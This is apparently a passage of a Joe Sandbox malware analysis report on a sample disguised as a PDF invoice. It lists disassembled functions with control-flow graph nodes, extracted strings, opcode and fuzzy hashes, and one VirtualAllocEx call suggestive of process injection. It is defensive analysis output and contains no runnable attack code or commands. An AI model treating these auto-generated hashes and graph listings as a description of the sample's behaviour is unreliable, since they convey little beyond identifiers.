                                                                                      • Opcode Fuzzy Hash: ec11f3ca44bd1ab173938354db9d82f4c383f33be092f444ae6eef714d21c0d8
                                                                                      • Instruction Fuzzy Hash: 2B51F474A042088FDB94DFA8D454BADB7F2FB49310F20802AD919EB395DB319E91CF61
                                                                                      Function 065C7CEC Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1089 65c7cec 1090 65c7dad-65c7dd7 1089->1090 1091 65c7ef1-65c7ef7 1089->1091 1115 65c7ddb call 65c8a09 1090->1115 1116 65c7ddb call 65c8a50 1090->1116 1117 65c7ddb call 65c8a60 1090->1117 1092 65c7ef9 1091->1092 1093 65c7f00-65c7f19 1091->1093 1092->1090 1097 65c817e-65c84a1 1092->1097 1098 65c80e5-65c80fc 1092->1098 1095 65c7f1f-65c7f27 1093->1095 1096 65c7c80-65c7c86 1093->1096 1095->1096 1099 65c7c8f-65c7c90 1096->1099 1100 65c7c88-65c86c6 1096->1100 1105 65c7fa5-65c7fe2 1097->1105 1106 65c84a7-65c84af 1097->1106 1098->1096 1102 65c8127-65c8131 1099->1102 1103 65c7e27-65c7e4a 1099->1103 1110 65c86c8-65c86cc 1100->1110 1107 65c86b4-65c86c6 1102->1107 1108 65c8137-65c813f 1102->1108 1103->1096 1104 65c7de1-65c7de9 1104->1096 1105->1096 1112 65c7fe8-65c7ff0 1105->1112 1106->1096 1107->1110 1108->1096 1110->1103 1114 65c86d2-65c86da 1110->1114 1112->1096 1112->1098 1114->1096 1115->1104 1116->1104 1117->1104
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &$1$9$xJ
                                                                                      • API String ID: 0-4019237314
                                                                                      • Opcode ID: f207b33a2faada8f066f3d786b01ec423a3fbc823acb02465b09259f69439c3f
                                                                                      • Instruction ID: 817a5036f6d7861ece6f77561a6ec2afdb8df02da867d6b6d6ef6e5c0f320ad7
                                                                                      • Opcode Fuzzy Hash: f207b33a2faada8f066f3d786b01ec423a3fbc823acb02465b09259f69439c3f
                                                                                      • Instruction Fuzzy Hash: 9C310774A15219CFEB90CF98E484BADBBF2FB49324F10445AE809AB744C7389D95CF91
                                                                                      Function 06760040 Relevance: 4.2, Strings: 3, Instructions: 484COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1211 6760040-6760068 1213 67600b6-67600c4 1211->1213 1214 676006a-67600b1 1211->1214 1215 67600c6-67600d1 1213->1215 1216 67600d3 1213->1216 1258 676050d-6760514 1214->1258 1217 67600d5-67600dc 1215->1217 1216->1217 1220 67601c5-67601c9 1217->1220 1221 67600e2-67600e6 1217->1221 1225 676021f-6760229 1220->1225 1226 67601cb-67601da 1220->1226 1222 6760515-676053d 1221->1222 1223 67600ec-67600f0 1221->1223 1232 6760544-676056e 1222->1232 1227 6760102-6760160 1223->1227 1228 67600f2-67600fc 1223->1228 1229 6760262-6760288 1225->1229 1230 676022b-676023a 1225->1230 1235 67601de-67601e3 1226->1235 1265 6760166-67601c0 1227->1265 1266 67605d3-67605fd 1227->1266 1228->1227 1228->1232 1250 6760295 1229->1250 1251 676028a-6760293 1229->1251 1244 6760576-676058c 1230->1244 1245 6760240-676025d 1230->1245 1232->1244 1239 67601e5-676021a 1235->1239 1240 67601dc 1235->1240 1239->1258 1240->1235 1268 6760594-67605cc 1244->1268 1245->1258 1256 6760297-67602bf 1250->1256 1251->1256 1273 67602c5-67602de 1256->1273 1274 6760390-6760394 1256->1274 1265->1258 1275 6760607-676060d 1266->1275 1276 67605ff-6760605 1266->1276 1268->1266 1273->1274 1295 67602e4-67602f3 1273->1295 1277 6760396-67603af 1274->1277 1278 676040e-6760418 1274->1278 1276->1275 1283 676060e-676064b 1276->1283 1277->1278 1300 67603b1-67603c0 1277->1300 1279 6760475-676047e 1278->1279 1280 676041a-6760424 1278->1280 1285 67604b6-6760503 1279->1285 1286 6760480-67604ae 1279->1286 1293 6760426-6760428 1280->1293 1294 676042a-676043c 1280->1294 1304 676050b 1285->1304 1286->1285 1301 676043e-6760440 1293->1301 1294->1301 1311 67602f5-67602fb 1295->1311 1312 676030b-6760320 1295->1312 1317 67603c2-67603c8 1300->1317 1318 67603d8-67603e3 1300->1318 1308 6760442-6760446 1301->1308 1309 676046e-6760473 1301->1309 1304->1258 1313 6760464-6760467 1308->1313 1314 6760448-6760461 1308->1314 1309->1279 1309->1280 1319 67602ff-6760301 1311->1319 1320 67602fd 1311->1320 1323 6760354-676035d 1312->1323 1324 6760322-676034e 1312->1324 1313->1309 1314->1313 1326 67603cc-67603ce 1317->1326 1327 67603ca 1317->1327 1318->1266 1328 67603e9-676040c 1318->1328 1319->1312 1320->1312 1323->1266 1325 6760363-676038a 1323->1325 1324->1268 1324->1323 1325->1274 1325->1295 1326->1318 1327->1318 1328->1278 1328->1300
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hwq$Hwq$Hwq
                                                                                      • API String ID: 0-3312440009
                                                                                      • Opcode ID: 730ca96304f7b35083eb586732be9285e21ba33fc21af7f9ca5c50110105ff95
                                                                                      • Instruction ID: cf78437b4417dadeece91351ec3b1f2767f54ed70692accf7db8543db4d13ce3
                                                                                      • Opcode Fuzzy Hash: 730ca96304f7b35083eb586732be9285e21ba33fc21af7f9ca5c50110105ff95
                                                                                      • Instruction Fuzzy Hash: E5126031A002049FCBA5DFA5D994AAEBBF2FF88300F14856DE5069B391DB71ED45CB60
                                                                                      Function 06761D08 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1341 6761d08-6761d45 1343 6761d67-6761d7d call 6761b10 1341->1343 1344 6761d47-6761d4a 1341->1344 1350 67620f3-6762107 1343->1350 1351 6761d83-6761d8f 1343->1351 1459 6761d4c call 6762620 1344->1459 1460 6761d4c call 6762678 1344->1460 1461 6761d4c call 6762619 1344->1461 1347 6761d52-6761d54 1347->1343 1348 6761d56-6761d62 1347->1348 1348->1343 1359 6762147-6762150 1350->1359 1353 6761d95-6761d98 1351->1353 1354 6761ec0-6761ec7 1351->1354 1356 6761d9b-6761da4 1353->1356 1357 6761ff6-6762030 call 6761518 1354->1357 1358 6761ecd-6761ed6 1354->1358 1360 6761daa-6761dbe 1356->1360 1361 67621e8 1356->1361 1456 6762033 call 6764450 1357->1456 1457 6762033 call 67644b0 1357->1457 1458 6762033 call 67644a0 1357->1458 1358->1357 1362 6761edc-6761fe8 call 6761518 call 6761aa8 call 6761518 1358->1362 1365 6762115-676211e 1359->1365 1366 6762152-6762159 1359->1366 1378 6761dc4-6761e59 call 6761b10 * 2 call 6761518 call 6761aa8 call 6761b50 call 6761bf8 call 6761c60 1360->1378 1379 6761eb0-6761eba 1360->1379 1368 67621ed-67621f1 1361->1368 1453 6761ff3-6761ff4 1362->1453 1454 6761fea 1362->1454 1365->1361 1369 6762124-6762136 1365->1369 1371 67621a7-67621ae 1366->1371 1372 676215b-676219e call 6761518 1366->1372 1373 67621f3 1368->1373 1374 67621fc 1368->1374 1387 6762146 1369->1387 1388 6762138-676213d 1369->1388 1376 67621d3-67621e6 1371->1376 1377 67621b0-67621c0 1371->1377 1372->1371 1373->1374 1386 67621fd 1374->1386 1376->1368 1377->1376 1393 67621c2-67621ca 1377->1393 1433 6761e5b-6761e73 call 6761bf8 call 6761518 call 67617c8 1378->1433 1434 6761e78-6761eab call 6761c60 1378->1434 1379->1354 1379->1356 1386->1386 1387->1359 1462 6762140 call 6764c50 1388->1462 1463 6762140 call 6764c41 1388->1463 1393->1376 1402 6762039-67620ea call 6761518 1402->1350 1433->1434 1434->1379 1453->1357 1454->1453 1456->1402 1457->1402 1458->1402 1459->1347 1460->1347 1461->1347 1462->1387 1463->1387
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq$4'sq
                                                                                      • API String ID: 0-1334358483
                                                                                      • Opcode ID: 8ae3587e05c3444c1b29a6e03700661fc366d8f5795560a59690141c64f1a88c
                                                                                      • Instruction ID: 9d333c35f8132cd7153248e7e39619b602b5a5b657ce1c0affa4bcdf0a32f600
                                                                                      • Opcode Fuzzy Hash: 8ae3587e05c3444c1b29a6e03700661fc366d8f5795560a59690141c64f1a88c
                                                                                      • Instruction Fuzzy Hash: E9F1ED34B00118DFCB48DFA8D998A9DBBB2FF89300F518155E916AB3A5DB71EC46CB50
                                                                                      Function 067662E0 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1464 67662e0-67662f0 1465 67662f6-67662fa 1464->1465 1466 6766409-676642e 1464->1466 1467 6766435-676645a 1465->1467 1468 6766300-6766309 1465->1468 1466->1467 1469 6766461-6766497 1467->1469 1468->1469 1470 676630f-6766336 1468->1470 1486 676649e-67664b5 1469->1486 1481 67663fe-6766408 1470->1481 1482 676633c-676633e 1470->1482 1484 6766340-6766343 1482->1484 1485 676635f-6766361 1482->1485 1484->1486 1487 6766349-6766353 1484->1487 1488 6766364-6766368 1485->1488 1495 67664b7-67664f4 1486->1495 1496 6766512-6766513 1486->1496 1487->1486 1490 6766359-676635d 1487->1490 1491 676636a-6766379 1488->1491 1492 67663c9-67663d5 1488->1492 1490->1485 1490->1488 1491->1486 1498 676637f-67663c6 1491->1498 1492->1486 1493 67663db-67663f8 1492->1493 1493->1481 1493->1482 1508 67664f6-676650a call 67667b0 1495->1508 1509 6766518-676652f 1495->1509 1499 6766743-676674e 1496->1499 1498->1492 1506 6766750-6766760 1499->1506 1507 676677d-676679e call 6761c60 1499->1507 1514 6766762-6766768 1506->1514 1515 6766770-6766778 call 67623b8 1506->1515 1508->1496 1522 6766535-676661b call 6761b10 call 6761518 * 2 call 6761b50 call 6765318 call 6761518 call 67644b0 call 67623b8 1509->1522 1523 6766620-6766630 1509->1523 1514->1515 1515->1507 1522->1523 1529 6766636-6766710 call 6761b10 * 2 call 67622c8 call 6761518 * 2 call 67617c8 call 6761c60 call 6761518 1523->1529 1530 676671e-676673a call 6761518 1523->1530 1575 6766712 1529->1575 1576 676671b 1529->1576 1530->1499 1575->1576 1576->1530
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$(wq$Hwq
                                                                                      • API String ID: 0-3835230346
                                                                                      • Opcode ID: 1bab3df400dcdd8962a0c89a8686a1643faa9750adce39eedec04cc9ab339cc7
                                                                                      • Instruction ID: 7affd457ed16e2e84b31ca48f59c5e5dd1dca38295cd180dd749273a018056d0
                                                                                      • Opcode Fuzzy Hash: 1bab3df400dcdd8962a0c89a8686a1643faa9750adce39eedec04cc9ab339cc7
                                                                                      • Instruction Fuzzy Hash: BFE13E34A00208DFCB45EF69D4949ADBBB2FF89300F518569E906AB365DF30ED45CB91
                                                                                      Function 065CB481 Relevance: 3.9, Strings: 3, Instructions: 117COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2014 65cb481-65cb568 2021 65cb56a-65cb576 2014->2021 2022 65cb592 2014->2022 2023 65cb578-65cb57e 2021->2023 2024 65cb580-65cb586 2021->2024 2025 65cb598-65cb647 2022->2025 2026 65cb590 2023->2026 2024->2026 2032 65cb653-65cb67e 2025->2032 2026->2025 2033 65cb0cc-65cb0d2 2032->2033 2034 65cb684-65cb68c 2032->2034 2035 65cb0db-65cb435 2033->2035 2036 65cb0d4-65cb7d8 2033->2036 2034->2033 2035->2033 2040 65cb43b-65cb443 2035->2040 2036->2033 2046 65cb7de-65cb7e6 2036->2046 2040->2033 2046->2033
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: '$d%yq$xJ
                                                                                      • API String ID: 0-492209187
                                                                                      • Opcode ID: 1c3c47e1a9f9457f3fc4e884d36de875db8e8f4cefa6f5e75ee4a10e8be7a1b3
                                                                                      • Instruction ID: 2a5d25a376e75ad864f4ecba81b3b992dc2dd10ce244ba13a2af7b7657e210b6
                                                                                      • Opcode Fuzzy Hash: 1c3c47e1a9f9457f3fc4e884d36de875db8e8f4cefa6f5e75ee4a10e8be7a1b3
                                                                                      • Instruction Fuzzy Hash: E2514B74A01218CFDB90DF68D841B99B7B2FF8A310F5181A9D54AEB344DB349E85CF51
                                                                                      Function 065C6476 Relevance: 3.8, Strings: 3, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$0$xJ
                                                                                      • API String ID: 0-961458259
                                                                                      • Opcode ID: 9558b5a8381bbf2ab12b6a304cd8ccf9c8e5954bb7f75d85c338825d51b6828d
                                                                                      • Instruction ID: ad201480f813d9803add86a3bb0fc5b4ae6a552de191b3b45092cacea845408e
                                                                                      • Opcode Fuzzy Hash: 9558b5a8381bbf2ab12b6a304cd8ccf9c8e5954bb7f75d85c338825d51b6828d
                                                                                      • Instruction Fuzzy Hash: CE012F74921118CFEB50DF98E894F8CB7F1FB46324F009558E549A3348C7789984DF14
                                                                                      Function 068E7858 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068E78CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223619295.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_68e0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID: W
                                                                                      • API String ID: 4275171209-655174618
                                                                                      • Opcode ID: c0d1d6a7bb65734290335e1bf8493b80aec193d07aa925462239d5ddcaf84a38
                                                                                      • Instruction ID: f76f1df38e113dca70db7cffd21c737f0c4e38b2eeb4e0fd741d689af9fbd606
                                                                                      • Opcode Fuzzy Hash: c0d1d6a7bb65734290335e1bf8493b80aec193d07aa925462239d5ddcaf84a38
                                                                                      • Instruction Fuzzy Hash: 2A115672900249CFCB10DFA9C845ADEBBF5EF58320F20881AE559A7250C775A544DFA0
                                                                                      Function 064D36E8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220887963.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_64d0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq
                                                                                      • API String ID: 0-780347173
                                                                                      • Opcode ID: 039bc07452b1addc4f914fada10c7b4ae7f3e880aa68ef22160a36e552d869d3
                                                                                      • Instruction ID: e0ff39221ea2966ce10aec07a16adb842cd8ebeb1b4fdb2ef8895166a080da55
                                                                                      • Opcode Fuzzy Hash: 039bc07452b1addc4f914fada10c7b4ae7f3e880aa68ef22160a36e552d869d3
                                                                                      • Instruction Fuzzy Hash: 5342F974E04209DFDF96DFA4D4A86AEBBB2FB4A300F10905AD5126B380DB345D46CF92
                                                                                      Function 065CC4C0 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $sq$$sq
                                                                                      • API String ID: 0-1184984226
                                                                                      • Opcode ID: c19d7f33916540a169ac2488880f1657390bb40378c12271b0578c34c80e9682
                                                                                      • Instruction ID: 7483addab84ef0e7382e5d2f8a955eb6facca104cb93ae118b0cd128f6f2bdfc
                                                                                      • Opcode Fuzzy Hash: c19d7f33916540a169ac2488880f1657390bb40378c12271b0578c34c80e9682
                                                                                      • Instruction Fuzzy Hash: 0C228834E002198FCB55DFA4D854AADBBF2FF88310F148419E915AB395DB34AD46EF90
                                                                                      Function 064D4210 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220887963.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_64d0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq
                                                                                      • API String ID: 0-780347173
                                                                                      • Opcode ID: b27e769c073762fadb3b8ce24196421fe1a7a89d4ef1dfa2f3d88916411e1f52
                                                                                      • Instruction ID: 248db7b8826a9fa8cb8bcf696c3228a41215731d9d3cd3cd89c979afc3fbe2d0
                                                                                      • Opcode Fuzzy Hash: b27e769c073762fadb3b8ce24196421fe1a7a89d4ef1dfa2f3d88916411e1f52
                                                                                      • Instruction Fuzzy Hash: 4CF1D274E01208EFCB95DFA8E5A8AADBBF2FF49315F20446AE506A7350CB345985CF50
                                                                                      Function 065CF660 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$d
                                                                                      • API String ID: 0-2709439444
                                                                                      • Opcode ID: 69a962fec604528e2773593f8f67d22720ff30589d727222815a32939d70a609
                                                                                      • Instruction ID: a9b6adbf41f98699ce771c3c1d44bb61ebbbec83ce5f47fe3f53c5fbe66a6551
                                                                                      • Opcode Fuzzy Hash: 69a962fec604528e2773593f8f67d22720ff30589d727222815a32939d70a609
                                                                                      • Instruction Fuzzy Hash: CFD167356006069FCB54CF68C88096ABBF3FF89320B25C96DD55A9B765DB30F846CB90
                                                                                      Function 065CD802 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Plsq$$sq
                                                                                      • API String ID: 0-3423461073
                                                                                      • Opcode ID: cf8aaeae2c8148d514897b791fba2f2be92236c6a95f4570d8f6230f3df10793
                                                                                      • Instruction ID: 9c3b5c61440864fd3b6079b7ec6a948733aca06cfd0518afad84047a042801e4
                                                                                      • Opcode Fuzzy Hash: cf8aaeae2c8148d514897b791fba2f2be92236c6a95f4570d8f6230f3df10793
                                                                                      • Instruction Fuzzy Hash: EBB10274B002048FDB54DF69C884AAABBF6FF89710B1141A9E505CB3B6DB71ED41CBA1
                                                                                      Function 065C36EC Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $xJ
                                                                                      • API String ID: 0-2278840398
                                                                                      • Opcode ID: 333be3ab0d2554bcedc000af8e6afc78aeb918f6a5383bb4ea5c5f66d95ae8d3
                                                                                      • Instruction ID: 739a996e565b1bab1ff3dd75f73e1deaaa02f345741fe59a78f49c66f9eb9771
                                                                                      • Opcode Fuzzy Hash: 333be3ab0d2554bcedc000af8e6afc78aeb918f6a5383bb4ea5c5f66d95ae8d3
                                                                                      • Instruction Fuzzy Hash: 12C1BDB0D0920DCFEB94CF99D448BAEBBB1FB46324F109419D416A72A1D3785A89CF85
                                                                                      Function 00D7A444 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHsq$`Qsq
                                                                                      • API String ID: 0-852806029
                                                                                      • Opcode ID: 236dacd0abdb45f278e22a34497b526399b9a9a59c2a9e96e3606f77774aa7c8
                                                                                      • Instruction ID: c1d17e29301b8743fc6d63a48fcb8755c267d5493aa675e4f847d3b2517fcb02
                                                                                      • Opcode Fuzzy Hash: 236dacd0abdb45f278e22a34497b526399b9a9a59c2a9e96e3606f77774aa7c8
                                                                                      • Instruction Fuzzy Hash: C4C1A0B4D062688FEB248F28D9487ADBBB1FB89305F1080D9D44DA3252DB714EC5DF22
                                                                                      Function 064D3EE8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2220887963.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_64d0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq$4'sq
                                                                                      • API String ID: 0-780347173
                                                                                      • Opcode ID: a3447431ef7cca3f4876ac80f91dfbf9368cc078c8f3cc920b7da550f001615a
                                                                                      • Instruction ID: 5140cb51924729d1b582f7d694ca46558415200fd7cf1b94122eba116f76550c
                                                                                      • Opcode Fuzzy Hash: a3447431ef7cca3f4876ac80f91dfbf9368cc078c8f3cc920b7da550f001615a
                                                                                      • Instruction Fuzzy Hash: E7A1E434E00209CFDB99DFA5D4586AEBBF2FF8A301F14802AE91267354CB355986CF51
                                                                                      Function 065C0539 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$xJ
                                                                                      • API String ID: 0-207754411
                                                                                      • Opcode ID: 40e0011f6b492da8d6387a5cb6b1db52f48860a7adb864bb4de95c2a2fb74e38
                                                                                      • Instruction ID: acf88e94539ff42e2320f3bcbd2b08f77bd08a8078137f27b5d51e14331f0ba8
                                                                                      • Opcode Fuzzy Hash: 40e0011f6b492da8d6387a5cb6b1db52f48860a7adb864bb4de95c2a2fb74e38
                                                                                      • Instruction Fuzzy Hash: 1DB1A074A05228DFDBA0DF58D894BDABBB2FB4A310F1081E9D549A7384DB315E84CF61
                                                                                      Function 066AF700 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$Hwq
                                                                                      • API String ID: 0-584953801
                                                                                      • Opcode ID: d7d6b4ff0f2340a70b00d00788e70d035a5d635025b558d6ab17ac704ed3348d
                                                                                      • Instruction ID: 44e68c87b03df1571c2538619e78a79d3af08951c2a4b6bb7839d3414daf7841
                                                                                      • Opcode Fuzzy Hash: d7d6b4ff0f2340a70b00d00788e70d035a5d635025b558d6ab17ac704ed3348d
                                                                                      • Instruction Fuzzy Hash: E561BF30700314AFC799AF38D854A6E7BB6EF89310B20446DE5068B3A5CF35DD46CBA5
                                                                                      Function 065CE092 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq$(wq
                                                                                      • API String ID: 0-707371155
                                                                                      • Opcode ID: 8e64a5b8bf2d1ead0367c7ad10732b5f325d38311626a731dfa50a474dcbbfd4
                                                                                      • Instruction ID: 0b5837246d0d48564a41575f861b13b50ee1382d0c16bdb4a15a028f124b1d42
                                                                                      • Opcode Fuzzy Hash: 8e64a5b8bf2d1ead0367c7ad10732b5f325d38311626a731dfa50a474dcbbfd4
                                                                                      • Instruction Fuzzy Hash: 5151DF317002149FCB559F68E891AAE7BA6FF84310F10856AF905CB392CF35DD42CBA1
                                                                                      Function 0676F736 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHsq$xJ
                                                                                      • API String ID: 0-2182200417
                                                                                      • Opcode ID: d88368e58eea06b9bd3bd421639fb5c74139e7946216ad6f0da0ff6e7faadf05
                                                                                      • Instruction ID: a042e0d43fedc7e12e2d40e5a86982a1a76ea4eee36ef569e00c505478582465
                                                                                      • Opcode Fuzzy Hash: d88368e58eea06b9bd3bd421639fb5c74139e7946216ad6f0da0ff6e7faadf05
